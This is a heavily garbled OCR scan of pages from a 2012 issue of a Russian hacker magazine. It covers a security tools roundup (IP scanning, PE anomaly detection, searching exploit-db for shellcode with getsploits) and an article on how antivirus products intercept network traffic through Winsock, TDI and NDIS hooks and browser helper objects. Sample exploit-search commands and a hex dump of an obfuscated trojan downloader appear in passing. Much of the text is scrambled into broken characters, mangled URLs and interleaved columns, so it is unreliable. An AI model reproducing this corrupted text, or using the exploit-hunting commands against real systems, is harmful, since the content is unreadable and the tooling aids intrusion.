рые могут быть расположены как на

Некоторыеособенности утилиты :

поисковый механизм, nредназначен­

l1ttp: / /\·H·H·J.google .e s http://www.ene~gyho s ting.nl

http: / /t·l\·1\·l.google. по

http://bite - network.com http://!-l\·m. m pЗ - do<-mload s .

ПОИСК СОСЕДЕЙ САЙТА ВМЕСТЕ С FINDDOMAINS

tu

одном, так и на соседних IР-адресах

работае т с nервой 1000 результа­

!это расширит список потенциаль-

тов поиска Bing;

но уязвимых мест жертвы). Так как

помимо Б инга получает доменные

http://www.google.cz http://www.google.co.za http://google .lt http: //google. s k http: //google .g>•

FindDomains работает в консоли, ты

имена с п омощью DNS;

легко сможешь встроить ее в свою

работает в многопоточном режиме;

пен т естерскую автоматизированную

прекрасно работает с Mono.

http: // www.google.f~

систему .

J1ttp : / /!-1!-1\·l.google .n 1

Утилита использует движок Bing'a,

П ользоваться утилитой очень просто:

поэт ому для работы будет необхо-

FindDomains.exe www.goog l e.com

l1ttp :/ /\-J\·1\·I.google .coA.Lta ltttn:/ /esb .iet"a. huet"нae. dk

. f.l<tfJIM 8 иuttl10i

1"'•1

8 «:-<ttllN

(N t l

Ав тор :

Ав т ор:

Автор :

Anton Kek s UR L: angry ip.o rg

The SX Team URL: bit. ly/ihELsw

sЗmyOn

Си сте м а:

Сист е ма :

С и сте м а :

' nix/win/mac

Win dows

"'nix/win

URL: b it . l y/w87Yuд

8 иJ•ttJtt7 8 иuttl101

...... ~ICttot ...

<""'

8 ffJ<t"1"

Иmо

• •• , . ,flllf 8 "и'flll}

1"'•1

• ·•1•tti11J

""'"

.о ... ,

8 ftJ<ItfiiH

!No\

!IU't!

6 ANGRY IP SCANNER- СЕТИ

ПОД

ИЩЕМ АНОМАЛИИ В РЕ-ФАЙЛАХ

КОНТРОЛЕМ

ЮЗАЕМ БАЗУ

EXPLOIT-DB.COM

ИЗ КОМАНДНОЙ СТРОКИ

Для усложнения задачи реверсера различные Если твоя повседневная работа связана

пакеры и протекторы модифицируют заголов ­

Е сли ты являешься заядлым консольщиком,

с сетя ми и их безопасностью, то наверняка

ки РЕ-файлов. Иногда аномалии в заголовк ах

то наверняка каждый раз в поисках экс­

ты должен знать о такой культовой програм­

могут уронить различные дебаггинг-тулзы

nлойтов тебе было лениво открывать браузер

ме как Angгy IP Scanneг !или просто ipscan).

и другие GUI-анализаторы, затруднив таким

и залази т ь н а exp l o1t-db.com . С появлением

Данный кроссплатформенный и опенсорс­

образом процесс изучения исполня емого фай­

утилиты getsploits !кс тати, написана она на

ный сканер прежде всего nредназначен для

ла. В таких случаях тебе поможет Ex eSc an-

Питоне) необходимость в этом отпалаl Данная

сканирования диапазонов I Р-адресов в сети

скрипт на Python'e, специально предназначен­

тулза может иск ат ь определенные сплойты/

и соответствующих им открытых портов.

ный для в ы явления таких аномалий. Утилита

шелл-коды/описания сплойтов с помощью

Прога просто пингует каж д ы й айп и шник

быстро сканирует выбранный исnолняемый

нескольких nоисковых оnций, а затем выво ­

на проверку его жизнесnособ н ости, затем

файл и об н аруживает все виды возможных

дить описания и лин к и для всего найденного

опционально получает имя хост а, М АС - адрес,

а н ома л ий в его заголовках. Обнаружение

стаффа.

список открытых портов и так далее .

п роисходит с помощью nодсчета контрольной

Кстати, с помощью плагинов !которые ты сам можешь написать на javal вnолне реально н е­

сумм ы , размера различных полей в заголовке ,

хи ло расширить список получаемых данных .

размера сырых данных, выявления имен

non-

ascii/пycтыx секций и так дале е.

Также в сканере присутствует целый ряд приятных фич вроде получения NеtВIОS­

Основные опции утилиты :

о: вывод результа т ов в файл;

q: «тихий » режим работы; h: по казать экран помощи .

Функционал скрип т а :

информации !имя компьютера, рабочая груnпа

ав т о м атизация поиска аномалий в РЕ;

Опции поиска :

и имя текущего Windows-юзepal, определения

опреде л ен и е сигнатур компиляторов и па­

--au t hoг:- автор эксплойта;

веб-сервера, сохранения результатов скани­

керов;

рования в CSV-, ТХТ- и XM L- фо рм аты.

с к анирование AP I д л я известной ма лв а р и;

Чтобы начать процесс скана, необходимо

отображение заголовка Р Е и таблицы им­

nросто вбить желаемый диапазон адресов

п орта;

--plat f oгm:- платфо рм а ! в ыбор из 47 nунктовl; --type: ти п сплойта --osvdb: ОSV D В-идентификатор сnлойта; --cve: СVЕ-идентификатор сплойта.

!нап ример, от 192.168.0.1 до 192.168.0.255)

н ативная nод д ержка генерации различных

в соотве тствующие окна или применить

отчетов.

Примеры поиска различных эксплойтов :

опцию их случайной генерации, а затем на­

Д ля использования сканера тебе н еобхо­

getsploits.py -о l inu x_shel l code.txt - -type shellcode gets ploits . py - о freeb sd_x86-64_local. txt - -pl atform 10 gets pl oi t s .py --a ut hor maxe v bull et i n

жать на кнопку старта. В результате начнется

дима питоновекая библиотека PEFile от Эра

многопоточный nроцесс скана, результаты

К а р реры . Н айти ее ты также сможеш ь на на­

которого ты сможешь наблю д ать прямо у себя

шем диске. П р имер заnуска сканера: exesca n .

на экране.

РУ

Х АКЕР

<path t o

е хе

fil e .

073

04/1 59/201 2

www.epidemz.net


MALWARE

Евгений Дроботун ldгobotunГclxakep.rul

s -· L Что у нас осталось? Дай-

к а вспомнить. А, вот что :

s m s u

к онтроль сетевого трафика и противодействие drive-by

з агрузкам, а также способы з апуска подозрительны х

приложений в изолированной и контролируемой среде

[им е нно так правильно раскрывается понятие

« nесочница » ]. Разберем все это прямо сейчас!

ОСЛЕЕJ. ЯЯ СТ ЬЯ УСТРОИСТВЕ АВ РОВ:

МОНИТОРИНГСЕТЕВОЙ

АКТИВНОСТИ И ПЕСОЧНИЦЫ ХАКЕР

07~

www.epidemz.net

04/159/2012


С антивируса ми покончено!

Общие

Проверка подлинности

l~--------------------------~

Се1Ъ

Дополнительно

Подключение через :

Подключение чере з:

1Щ1 AMD PCNET семейство PCI Ethern

~

1 Н астроить...

QТh1еченные компонен ты исnольз)'IОТСЯ эn1м подключением :

л

-

J

~Ю ~ L.лужоа .аt1ступа к q;>аилам и принrерам сетей Micr<

~ ~ План1~оовшик пакетов OoS

v

<

>

1 Уствновить... 1 1L.._--'!далить 11 = - - - - -- J

Своf!ства

находится библиотека

ws_32.dll,

в которой

реализованы функции Wiпsock [send, гесv,

r/!1 Кaspersky Antr-Virus NDIS 6 Rier

conпect и так далее!. Большинство приложе­

U

~'

ний взаимодействует с внешним миром [то

r uaroox onogeo

rче worкrng

] vnver

~ ...._ Протокол Интернета версии 6 ~

..&.

СР 11Pv6)

Протокол Интернета sерс~1и 4 (ТС Р/1Рv4}

Позвол~ет данному комnь ютеру получать доступ к

1 Устgнови1Ъ... 1 L[_ _"laa ="-""'_:_---'1 1 Сво~стеа Оnисание По3е оnяет аанном)' компьютеру получать дОСТ)'П к ресурсам в сети Mtcrosoft .

~ УведОМlJЯТЬ nри ограниченном или отсутствующем

есть с Сетью! именно через эту библиотеку, перехватив вызовы функций которой, можно легко посмотреть все, что эти приложения

отправляют в Сеть или принимают из нее.

"'

Microsoft.

~ flpи подключении вывести значок в области уведомлений

можно представить в виде не­

скольких уровней. На самом верхнем уровне

0

~ ~ Планировшик пакетов OoS ~ ~Сл;-жба дОСТ','Па к Файлам и nринтерам сетей Micrc

Описание ре сурсам в сети

Windows Настрои ть ...

,!;омпоненrы, используемые этим по.о.ключением :

[ ~- ~ avast! Firewall NOIS Filter Driver

роще н но модель сетевой подсистемы

VirtuaiBox Host.Qn~· Bhemet Adapter

подключении

Когда-то давно некоторые брандмауэры и другие системы защит так и поступали, но в настоящее время так уже никто не делает, поскольку, во - первых, зловредные приложе­

ния могут работать в обход

11

ws_32.dll,

вызывая

функции более низких уровней, а во вторых,

NDIS-фильтры , устан овл енные в системе Avast 'oм и <~ Касперским »

большая часть сетевого трафика также может проходить на более низком уровне.

lil

Ниже

ws _32 .d ll находится драйвер afd.sys

о мнению операционной системы от

ч то удовлетворяет заданным условиям, про­

Майкрософт, файлы из интернета

пускается, остальное- блокируется [с экран­

[ Ancillaгy Funct i oп Driveг for WiпSock- вспо­

могут быть полезны. А еще они могут

ным предупреждением или без н его, с записью

могательный служеб ны й драйвер!, в котором

быть вредны . И для того, чтобы отделить

в журнал событий или без- в зависимости от

как раз и реализованы все функции работы

первый тип файлов от второго, рядовой юзер

настроек компонента сетевой защиты!.

с соке там и [создание сокетов, установка

сое динения и так далее!. Можно сказать, что

использует антивирус. А как современные

И опять мы вышли на ту сам ую - нашу

антивирусные средства определяют «бла­

любимую :1-двухкомпонентн ую схему анти­

ws_3 2.d ll

гонадежность» того, что идет из сети? Как

вирусной защиты из самой перв ой с татьи. Есть

невую обертку над

различные системы защиты могут проконтро­

не что, что «сидит» на всех возможных путях

то между

лиров ать и остановить трафик, порождаемый

сетевого трафика в компьютер е и перехваты­

и

вредо носными программами?

вает этот трафик, а есть нечто, что анализирует

межуточной обертки. Н екоторые брандмауэры

этот трафик и принимает р е ше ние о дальней­

<<са дятся>> на эту библиотеку с целью филь­

чала необходимо определиться с некоторыми

ших действиях. Эти два <<неч т о>> и являются

трации трафика, но эффективность такого

основными вещами. Прежде всего, понять, чем

технической и аналитиче ской соста вляющими

ре шения оставляет желать лучшего, поскольку

является компонент антивирусной защиты, от­

компонента антивирусной защиты, ответ­

в ре даносы могут запросто обратиться напря­

ветственный за безопасность взаимодействия

ственного за сетевую безопасность.

мую к

Чтобы ответить на эти вопросы, для на-

Аналитическая составляющ ая в своих

с се тью. Это не что иное, как фильтр, который

представляет собой высокоуров­

afd.sys. Если быть точнее, afd.sys и ws_32.dll находится еще msafd.dll в качестве так называемой про­

afd.sys,

а то и вообще мимо всех со кетов .

Опуст ившись еще ниже, можно увидеть

находится между приложениями и сетевыми

действиях опирается на сигнатуры и эвристи­

драйвер

компонентами о перационной системы, решая,

ческий поиск: шаблоны, правила, весовые ко­

ЧТО МОЖНО, а ЧТО НеЛЬЗЯ. Для ЭТОГО ОН ПрОИЗВО­

эффиц иенты- все то, что мы уже << проходили>>

протокол tcp/ip. Это так называемый уровень транспортного [или сетевого! протокола TDI [Тгапsрогt Data lпteгface- интерфейс пере­ дачи данных!. Здесь также можно найти,

tcpip.sys,

в котором реализован

ДИТ внедрение указанного фильтра в ключевые

ранее. А вот о том, что касается тех нической

места взаимодействия приложений и сети, осу­

составляющей, - той само й, кото рая должна

ществляя анализ всего трафика на предмет со­

перехватывать трафик на все х возможных

например, пwlпkipx.sys, реализующий про­

отве т с твия определенному набору правил. Все,

путях,- мы поговорим более подробно.

токол

ipx.

Для фильтрации трафика на этом

f4e5e(tn9'1~

Jt Diш~ ] ~ OeЬuoYitw ]tJ' S'rSWOS..W:eDI!fЩ)tOI'i~ ] il' ~I'SI:ernStr<UDtw\:МfT.Ы.Shmw ] Q

тne: .. nJP~DeюoiiiOtT.Ы.

.:),

~•IIIIМDdfktt!Onl !

-------- ------ ------------- -- ----- ----- ----------------------------------

; Ndi installation support

-------------------------------------------------------------------------

""""'~

''"""" Oxf83Мl'\C

1~1~ :;

ах~'~

IATМodkeUon :;., IAT~ ;:. IA1Мod{QW1 ;:,_,

O>:I'O'!Dme

D>:F8'S96780

DFfAS9110 !)fi'AS9110 DI'F/159110 OFH59110

6031DOel 6037DOeJ 603JD081

D.<IIOSIII'AU•:C:\WJNXJWS\oyot....nyc............. [PAQ:):Joer..t~ Oxti059fAOI'::C:\W~Jytt~ ... exe[P~o;;;fj:JQCrutt()r;(o 0d059FAU::C:\W~Ofi·t ...ц,[Pдo;;;f]:JQC/o.Ce0rt!Co 1)(8()5\IFIOI' :: C:\W!IOOWS\rntetl'l32\rii:OI»... U1[P.:.GE] :It:IIЛ~.O.VO:.

ОхFезпоо \...CC:..c:.:...::..::..__ _ ,.,__.:..c.c '_:_''n:-,~ ,-'::~-',:::'~:.,.-:-;:c,':..:.~:..c~~'.-,-''::"" -" ••-'.,':-';:.~-' - ~P< ..:. '':c:.=:-.-"""-'"'""""""' -=="..:.·'..:. " :... '"="1-=T...: ""-'-"-'-'--'.J

1

КernciDctccllwv12

*

f ..

dweng(neexe

Se(~~

o-Иiftllet j ~ DtW;Yiew ]<7 SVStttnSen1ceo.sщ.tOtT~ j j> S\"SS:It!ISen-i<•DI!wdot r.ы.~ j Q IN:wn.fi:Diшt«ori.Ы. J} ~l!lne!мodticatioriS 1

[rns t_Ndi] HKR, Ndi, servi се,, "KLIM б" HKR, Ndi ,coser vi ces , OxOOOlOOOO, "KLI Mб"

Зн~ч~ни~ F il t~rC i llss оnред~л ;~ ет nолож~ ни~ '~груж.,~мого Qильтрi!l е очереди. ее его

нкR, ~m·~~~~~~~ii~~~;q можетбь1тьеосемь3н.,ченL1й.

HKR, HKR, HKR, HKR, HKR, HKR, HKR, Ndi . ~ i1terRunтype, Ох00010001, 2 HKLM, sys t em\ Cur г entcontгo 1set \ Sec vi ces \ KLl

ndiS\'lan, ndis\·Janas "klimб"

~~~~~бs~; ~:~~~~; ~~~tCOI1tГO 1 Set \Seгvi ces \ Kll, ------------------------------------------; ser vice insta11ation support Кerne1Drtectlvev12

*

Fle

~lir>Oo

WU411Cite.c

[rnst а 1 1. servi ces]

~

О!и!:~ ~ ~ OetiuQV..... ] (/'\ Syot.m58Мr:e[)eJЩ(O'T~ ~

0.'' ~Vhi'ISIМ:IDeюfr>tct' Tibll!~ ~ 0

Adds er v ice=K L IMб, , K L IMб_s e rvic e_rnst

!ШtrЩDeюdOtl.tlll

[KLit-1б_se г v i

Значение F ilt ~rType оnределя~т тиn Фильтра , е данном ел~ а е Ох00000002 говорит о том, что

дpailsep модиQицирующий

ce_rns t ] Di sp1 ayName - %KLI,..1б_Desc% Servi се туре .. 1 ; SERVICE: _KERNEL _DR IVER Startтype "" 1 ; SERVICE: _SYST E:M_START

П е ре хва ты из

ce Object

ХАКЕР

loCreateDevice в << Касперском >> и DrWeb, пере х ват TdiRegisterDevi-

Часть содержимого iпf-файла драйвера фильтра

tdi.sys в

Касперского »

« Касперс к ом » шестой и седьмой версий

klim6.sys из состава << Антивируса

075

04/159/2012

www.epidemz.net


MALWARE KerпeiDetectivev1.2::VBoxTray• File

Settings

Help

~ DisassemЬier 1 ~

Debug View

1С?

ТаЬiе 161'

System Service Descriptor

System Service Descriptor

ТаЬiе Shadow 1,:;;;.

1Len 1 state

Address

5 5

Ox8052D903 Ox8052DF74 Ox80534DM

ТаЬiе Ь

Kernel ~lodifications

1

1 Current Value 1 Original Value \ Dist ination Module Е 97058 4 ...

Relative Jump :: jmp OxF69D3 178 Relative Jump :: jmp OxF69E8650

Е9

D7

Аб

4 ...

се

OxF7525DЗ4

ЕАТ ~lodification:: OxF751261E

OxF7525DCC

ЕАТ Modification:: OxF75127FD

-> NDJS.SYS (PAGENPNP] ::NdisCioseAdapter

Е?

02 02 ЕВ 02 Е7 02

·> NDJS.SYS [PAGENPNP] ::NdisDeregisterProtocol OxF7508397 ·> NDJS.SYS (PAGENPNP]::NdisOpenAdapter

ЕАТ ~lodification:: ЕАТ ~lodification :: OxF750817D

Е7

·> NDIS.SYS (PAGENPNP]::NdisRegisterProtocol ~-

1 ·.

Settings

Interrupt Descriptor

--~

~---

00 00 00 00

FA 8B450 ... FA66837 ... FA

OxF69D3178::0xF69E8650 :: -

1Е260100

OxF752E750 :: OxF752E7FO:: OxF752E820 :: OxF752E7BO ::

FD 27 01 00 97 83 00 00 7D8 1 0000

inspect.sys [.text] inspect.sys [.text] inspect.sys [.text] inspect.sys [.text ]

-~~---~-~~--

~.'t.a!.-...,~: ...

~~

~

·--~

~

·

Help

~ DisassemЬier 1 ~

Debug View

1С?

Т аЬiе 1dJ'

System Service Descriptor

System Service Descriptor

Т аЬiе Shadow 1Q

Interrupt Descriptor

Т аЬiе

1

Kernel

~lodifications 1

Address

Distination Module

OxF8397F08 Ox804D8F94 ~~~~~~~~~~.~o~o~~~~.~~nm~~----~~----~----~--~--~~--~

OxF7 13AB04 :: С:\ WINDOWS\system32\drivers\afwcore. sys [ .1 OxF7804C78 :: • OxF77CF9CO :: •

Ох804D93Вб

Е9

Relative Jumo :: imo OxF77CF9CO

.. .

FA 8...

Пер ех ват NDIS-функций антиви русом от компании Comodo (вв е р х у! и в OutPo st Fir eWall Pro 7. 0 ! вни зу(

уровне необходимо перехватывать все вызовы

драйвер сетевой карты, поэтому антивирус или

с око, да и такой фильтр-ловушка может быть

к устройствам \Dev ice\Rawlp, \Device\Udp и\

брандмауэр, <<си дящий>> на NDIS-ypoвнe, пере­

установлен в системе все г о лишь один.

Device\Tcp [в случае работы по 1Pv6- \Device\ Rawlp6, \Device\Udp6, \Device\Tcp6 соот­

только проходит через компьютер .

хватывает практически весь трафик, который

ветственно]. Это достигается либо вызовом

В этом вопросе все известные а н тивирусы проявляют единодушие- чтут рекоменда­

Сегодня подавляющее большинство пра­

ции компании-прсизводителя операционных

вильных антивирусов контролируют трафик

систем и третий способ в своих продуктах

указателей таблицы диспетчеризации, либо

именно на этом уровне. Существует по мень­

не применяют [хотя, говорят, встречаются

перехватом loCгeateDevice до инициализа­

шей мере три более или менее документиро­

производител и, которые эти рекомендации

ции этих устройств, чтобы в дальнейшем

ванных и легальных способа проделать зто.

игнорируют, но мне что-то такие антивирусы

полностью их контролировать. Некоторые из

Первый способ !самый легальный из всех и ре ­

и брандмауэры не попадалисьl.

антивирусов именно так и поступают. Напри­

комендованный Microsoft к использовани ю]­

мер, ранний « КасперскиЙ>> перехватывал эту

это так называемый

функцию путем модификации таблиц импорта

[пр омежуточный драйвер NDIS]. Вт орой способ

применяют либо только первый, либо первый

в нужных драйверах, так же делает Dг.Web,

[его еще иногда называют <<nсевдопроме жу­

в сочетании со вторым, и лишь некоторые до­

изменяя таблицу им п орта в драйвере

точный драйвер>>] есть не что иное, как пере­

вольствуются только вторым.

loAttachDevice,

sys.

либо прямой модификацией

tcpip.

Для этих же целей <<КасперскиЙ>> шес т ой

и седьмой версий перехватывал функцию

TdiRegisterDeviceObject

из

tdi.sys,

модифици­

lnteгmediate

хват некоторых функций из

Driver

ndis.sys. Третий

способ- Filter Hook Driver [драйвер фильтра ловушки] представляет собой обычный kernel-

руятаблицуэкспортаэтогодрайвера.

mode

драйвер, который фильтрует сетевые

пакеты на уровне

Далее, еще ниже, находится драйвер под

названием NDIS [Network Driver lnterface

Specification-

NDIS

IP. Microso ft

категорически

не рекомендует использовать этот способ

Промежуточные N ОIS-драйверы в антиви­ русных программах могут быть двух видов: не­

посредственно промежуточный драйвер - как правило, в

Windows ХР,

так как других там и не

предусмотрено [NDIS версии

51,

и драйвер­

фильтр- эта разновидность промежуточных

в средствах контроля трафика и антивирусной

NОIS-драйверов появилась начиная с

защиты. Этот драйвер ставится слишком вы-

Vista [NDISвepcии

спецификация интерфейса

сетевых драйверов]. Ниже него -только

Что касается оставшихся первых двух

способов, то подавляющее большинство

Windows

61.

Остановимся на различиях промежуточных драйверов и драйверов-фильтров. Итак, когда трафик движется в сеть, то есть от протокола

Управл е ние надстройками

к сетевой карте, он проходит через очередь

пользовательских драйверов, которую сфор ­ Просмотр и управление надстройками. установленными на этом компьютере . Отключение или удаление надстроек может наруши-rь работу некоторых веб-страниu .

мировал

NDIS.

Внутри этой очереди распола­

гаются промежуточные драйверы, которые выстраиваются в очередь по неизвестному

Qтобража-rь : [ Надстройки. загруженные в lntemet Explorer Имя Разрешено

~

Издатель

алгоритму, однако спецификация гарантирует,

·] " Состояние

что трафик пройдет через каждый драйвер Ти п

(5)

в этой очереди. Промежуточный драйвер пред­ ставляет собой обманку: <<сверху>>, то есть для драйверов, которые располагаются над ним,

Research

Разрешено

Расширеf

он выглядит как минипорт [хотя настоящие минипорты еще далеко внизу], а «снизу»- как

~ Виртуальная клавиатура

Kaspersky Lab

Разрешено

Расширеf

~ Проверка ссылок

Kaspersky Lab

Разрешено

Расширеf

В свою очередь драйвер-фильтр - это

~

Fi lterBHO Class

Kaspersky Lab

Разрешено

Объект м •

драйвер, который располагается также на

~

IEVkbd BHO Class

Kaspersky Lab

Разрешено

Объект м •

протокол [хотя протоколы далеко вверху] .

пути следования трафика от сетевой карты до протоколов, однако конкретное его местополо­

жение в очереди определяется настройками, Модули ВНО от « Антивируса Kacnepcкora» в

lnternet

содержащимися в inf-файле зто го драйвера-

Е х рlог ег

ХАКЕР

076

www.epidemz.net

04/159/2012


С антивир ус ами п окончено!

фильтра. П о мим о месторасположения драйвера-фильтра в iпf-файле указывается еще и тип этого др ай в е ра: драйвер-монит ор, дающий возможность только nросматривать

трафик, или драйвер-модификатор, допускаю­ щий еще и модификацию трафика. Дум аю, понятно, что второй тип в антивирусах исполь­

зуетс я гораздо чаще, чем п ерв ы й. Другая возможнос т ь контролировать

ПЕРЕХВАТИВ ЭТИ ФУНКЦИИ, МЫ СМОЖЕМ КОНТРОЛИРОВАТЬ ПРОЦЕСС ИНИЦИАЛИЗАЦИИ ВСЕХ СЕТЕВЫХ

СОЕДИНЕНИЙ, А В ИТОГЕ- ВЕСЬ ТРАФИК

трафик на NDIS-ypoвнe- это, как мы уже гово рили, перехват некоторых функций

из NDIS-дp aйвepa. Из всего многообразия

на них! гораздо целесообразнее и проще осу ­

ссылки, которые, равно как и со держим ое

функций, экспортируемых этим драйвером,

ществлять непосредственно в самом браузере.

адресной строки, необходи м о о т слежи вать

наиболее подходящи ми для данных целей

Для этого многими антивирусными продук­

и контролировать. Помимо вредоносных

будут Ndi sOpenAdapteг и NdisR egisteгPгotocol.

тами используется возможность наращивать

ссылок, в содержимом веб - с траниц могут быть вредоносные Jаvа-скрип т ы, для распознава­

П е р ехватив эти функции, мы сможем контро­

функциональность браузеров посредством

лировать процесс инициализации всех сетевых

расширений. Чаще всего используются ВНО

ния которых на помощь о пять-таки приходят

сое динений, а в итоге- весь трафик , про­

антивирусные базы с с и гнатура ми.

ходящий через эти сое дин е ния. Так поступает,

IBгowseг Н еlрег Object- модуль поддержки браузераl . Модули ВНО реализуются в виде

например, ан ти вирус от компании

dll-библиотек, которые дополняют lnteгnet

няемую базу сиг н атур вредоносных скриnтое

Comodo,

В общем, имея хо р ошую и регулярно попол­

который помимо установки промежуточного

Ехр l огег. Как правило, объекты ВНО не имеют

и ссылок на вредоносные сай ты , м ожно д о­

NDIS-дpaйвepa еще и перехватывает функ-

собст венного пользовательского интерфейса

статочно успешно отсеиват ь почти всю заразу,

ции Ndi sDpenAdapteг, Nd is Reg isteг P гo toco l,

и су щ ествуют в виде простой библиотеки, ко­

которая может встрети т ься в сети. Почт и

NdisCioseAdapteг и Nd isDeгegisteгPгo to col.

торую браузер подгружает nри старте. Сп е ктр

всю- nотому что какой-нибудь свеженький

Н екоторые системы защиты интернет-

возможного применения ВНО огромен - от мо­

скрипт, которого нет в базе, будет наверняка

трафика довольствуются перехватом только

дуля, который отслеживает вводимые в адрес­

пропущен и с делает свое черное д ело. Б олее

NdisOpenAdapteг, который позволяет отследить

ную строку данные, до подмены содержимого

того, даже самый с т арый с крипт, который есть

уста новку и инициализацию сетевых адапте­

веб-страниц и перенаправления запросов.

ров в с и стеме. Самое гл авное nри использова­

Чт о может сделать с содержимым, к при­

во всех антивирусных базах, можно за пр ос т о зашифровать или обсфусц ировать по-новому,

нии такого рода перехватов функций- успеть

меру, адресной строки антивирус, перехва­

перехват и ть их раньше, чем произойд ет иници­

тивший посредством ВНО данные из lnteгпet

може т пройти мимо всех препон, выстав ­

ализация какого-нибудь се т е вого соединения,

Ехр lо гег 'а? В о -п ервых, nрогнать э тот адрес по

ленных антивирусн ыми ска н е р а ми сетевого

иначе контролировать его уже не пол учится .

своей базе вредоносных ссылок и заблоки­

трафика.

ровать вывод страницы в случае наличия за­

-и вот он уже и не такой с тарый, и запросто

Поэтому на помощь приходят эврист ик а

прашиваемой ссылки в этой базе. Во-вторых,

и динамический анализ ко д а [ то ест ь его ана­

можно обратиться к различным облачным ре­

лиз во время исполнения!. К примеру, при ана­

сурсам [собственным или посторонним! и, в за­

лизе html-кoдa антивирусы смотрят на пара ме­

y poвнe, можно было бы на э т о м и успокоиться.

висимости от наличия этой ссылки в их базах

тры, используемые тегом if г ame !напомню,

Но все же контроль за со д е ржимым адресной

или на основе различн ых рейтинговых оценок,

этот тег в тексте страницы часто используется

строки браузера, веб-страни ц и jаvа - скриптов

предупредить пользователя о nотенциа льно й

для н ев идимой инеконтролируемой загрузки

[а ответс тв ен но сть за распространение

вредоносности посещаем ой страницы.

вредоносных объектов!. Если эти параметры

нечно, перехватив весь трафик на

ND IS-

вре д онос н ых программ посредством dгive-by за гру зо к в боль шин с тв е случаев лежит именно

'" '" ·~ ill..

li iil

'"'

т~

663 t"'",J0248) 6681"'-.898722 726 183.829SOf.i ~48 185.969SS1 762 186.0:270J .. -~- 187. 065:"28 Р8}8 7 .11.,."](

ООО!Ю

000.110 ОООЬО

000<:0 OOOdO оооео

OOOfO 00100 001 10 00120 00130 00140 00150 00160 001 70 00180 00190 ооао 001ЬО 001с0

001d0 OOleO OOlfO 00200 00210 00220 ооно

00240

0'1 IC2 ..

:,~t",....н,~.н.~

~~~~~. U

192.168.0.102 94.100.191.213 192.168.0.102 191.168.0.102 192.168.0.102 192.168.0.102

~ . 100 . 191.213

-~~~

ze

О•

бе п

73

Ze

ба

20 Zit. 20 68 74 ; .:

71 1S

бS 0&

бS

12 79

20 211.

О.а

20

30 30 39 2d )0 32 2d

Jlo Н 31 20 2d 30 35 30 З1

39 20 415 CIS 62 69 73 69 28 66 75 бс Jd 7.:1 бS 72 79 1S бS 72 6е 28 45 77 20 бf 7d 2с 4.1 Sc 7} 29 Sb Sc 77 Se 3~ 23 6• 3d 6f 6t 69 74 29 7Ь 45 69 66 28 68 69 73 6е б 7 74 6S 78 11] 7d 69 22 13 74 44 2е 65 28 47 Sb

бS

76 2f о~ 61 72 20 ба Sl 75 2t 6~ 51 74 69 6f 20 бе 65 2С 46 29 28 2е 7с St 23 28 Se 2е Sb 6f 2е 66 3d 7 Ь 69 4S 2с 48 6е 74 ЭЬ 29 7 Ь 74 2t 6с 65 6f 6t 14 74 68 69 Jd 3d 3d 20 н зd 4 7 26 26 52

2~

~~~~ ~ ~~ ~~

12 ~~

20 32 6f 61! 6е 63 68 69 2с 70 79 3d 2с 46 2е бб

3d 2f 2Ь 3t 2d Sd Sc Sb 2t 70 3а 66 3d 45 45 2t Sb 30 68 3d Jd 45 66 28 72 69 78 6S 31 Sd

Непосредственно в самом соде ржимом

кажутся ему подозрительными !типа высота

веб-страницы тоже могут т аиться нехорошие

и ширина равны нулю или очень маленькие!,

• .LV<t

192.168.0.102 94.100.1""91.НЗ

9.1.100.191.213 94.100.191.212 21","],200.219

10 J;r,

zr zr

64

бt

63 7 3

63 б f бd 2f 4с 69 63 бS 2il 20 44 61 74 бS 3• 20 з; ];r, н s.: 68 7 S 2с 29 Оа 20 ~~ 32 з.: 36 О~ 6 е 28 29 7 Ь 2с 79 3d 6с

]1 39 20 )1

]4

30 20 28 зо зо 39 3~ 20 36 1-1 69 6f 73 2с 67 Jd 6с 2е N бс 2е 24 3d 29 7Ь 72 6S бе 2е 69 6е St Sb Se ]С 29 Sb Se )е 2Ь 29 24 2f Sc 2е 2с Sd 12 бf 7J. бf 1S 6е 63 74 7 с 7 с Ы 6f

20 20 20 76 21!

бе

бf Ы

66 74 69 Sd Sd 2с

2~

74 69 63

б5 ~

5d 3d 4S 3Ь 31 3Ь 74 68 Jb 72 65 74 74 79 70 65 бе б7 22 29 63 за 4S 29 7 с 7 с 21 48

74 69 75 6f 7Ь

эь

29

6f 3d бс 75 бе 63 75 72 6е N 28 45 2~ 28 3С U 24 7 с 66 3d 2f 24 2f ЗЬ 79 10 65 бf бе 28 75 6d 65 79 70 65 68 69 73 7 3 2t f'Н 72 6е 20 66 20 45 76 6 1 12 69 66 28 29 7 Ь 69

~~ ~~ ~~ ~~ !~ ~~ ~~ ~~ ~~ ~~ ~~

Те кс т Jаvа- с крип т а в перехваченном httр-трафике

Обфусцированный вредоносный Jаvа-с к рипт под названи е м Trojaп-Dowпloader. Js . Ageпt .

ghd !понять, что он делает, довольно з атруднительно!

ХАКЕР

04/159/ 2012

077

www.epidemz.net


MALWARE

f.oh

l]poo..

ko

-

ISI4f>a-• '""''"'

[fJ&Of.O.DИ l1'11 .. NI · MI 1·(~1lf~ 1 1 FXI JI .r..I ~-IM(.U8 1-Canl\IKDI I

\fШ.t1<· 1o',..&.М.&I I •·f91< ~.01

~ Рц1

m.t · Wm0Ьg:6.12.0002.Ш Х86 Eol• idit ~""" I!Rug W\ndow ~tlp ~ '1 ! .:}1'1'• i'JU\lP1 1 '-'!~ IЫ~ CJEJ O:,ВIU1DD!!:![I)Ш д,. 11§

Про

NDIS мо ж но почитать на ~

[ FJOJН2~ - I IJ<·IIDI·I8r1 .(10(/Wf&ШUIJ ( llilcJ6C.4,ocO- IJ<I-IIIW1 «1•oOiltl~ l

..,.,

......,._.oci Catopfl

76fb8? o 790

ru/story/yyedenje-v-

nop

ntdllllltllot•IVChsngeMult~~~~m~~~mJ~~~~~~ 76fbB?oB е9•3о321106 ар SЫ. •D 11 1Sb !eD11 StortCOK+Ox1? 40 {7d242b90) 16fЬ87 •d Ьо. 000Э fе1f х. = ar se1· а ys e lt u rfeOЭO O )

~<~,-ж.... и О Ш<"Рt

(1 1\l <lbl>NcO • II<I·ЬIIIl.OOo.oolo~butJ ! !IIЩfJ.focO•il<l • !r6d!:/J!1ttOQb~ШI!

1

?6fbB?b2ff 12 c:all ?6fb8?M с:23000 ret 76fb87b790 nc:~p nt d lll ZvOpenD ~ rec;tgryOb]ec::t

dvcrdptr[otd x J

76tЫ7Ь8 ЬВЬ7000000 761Ы7Ьd Ь..ОООЭfо?f

маv

eax . OB7h

76fbB7c: 2 ffl2

c:all ret

76fЫ7c:l с:20с:ОО

